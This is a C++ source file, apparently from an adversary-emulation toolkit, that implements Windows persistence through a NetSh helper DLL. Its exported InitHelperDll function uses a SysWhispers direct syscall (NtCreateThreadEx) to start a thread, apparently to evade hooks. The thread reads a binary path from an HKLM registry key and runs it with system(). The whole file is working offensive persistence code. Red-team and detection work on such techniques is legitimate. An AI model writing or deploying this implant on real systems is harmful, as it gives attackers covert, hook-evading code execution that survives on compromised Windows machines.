Use SysWhispers with NetSh DLL helper persistence to spawn processes at a given registry key

whisperNetshHelperPersist.cpp

#include <locale>
#include <cstdlib>
#include <stdio.h>
#include <string>
#include <Windows.h>
#include "Syscalls.h"

LONG GetStringRegKey(HKEY, const std::wstring&, std::wstring&, const std::wstring&);

DWORD WINAPI RunBin(LPVOID lpParameter) {
    setlocale(LC_CTYPE, "");
    HKEY hKey;
    LONG lRes = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Prelude\\Operator", 0, KEY_READ, &hKey);
    bool bExistsAndSuccess(lRes == ERROR_SUCCESS);
    bool bDoesNotExistsSpecifically(lRes == ERROR_FILE_NOT_FOUND);
    std::wstring strValueOfBinPath;
    GetStringRegKey(hKey, L"bin_path", strValueOfBinPath, L"bad");
    if (strValueOfBinPath == L"bad") {
        return 1;
    }
    const std::string s(strValueOfBinPath.begin(), strValueOfBinPath.end());
	system(s.c_str());
	return 0;
}

LONG GetStringRegKey(HKEY hKey, const std::wstring& strValueName, std::wstring& strValue, const std::wstring& strDefaultValue)
{
    strValue = strDefaultValue;
    WCHAR szBuffer[512];
    DWORD dwBufferSize = sizeof(szBuffer);
    ULONG nError;
    nError = RegQueryValueExW(hKey, strValueName.c_str(), 0, NULL, (LPBYTE)szBuffer, &dwBufferSize);
    if (ERROR_SUCCESS == nError)
    {
        strValue = szBuffer;
    }
    return nError;
}


extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved) {
	HANDLE hThread = NULL;
	HANDLE hProcess = GetCurrentProcess();
	LPVOID lpParams = nullptr;
	NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, hProcess, RunBin, lpParams, FALSE, 0, 0, 0, nullptr);
	return NO_ERROR;
}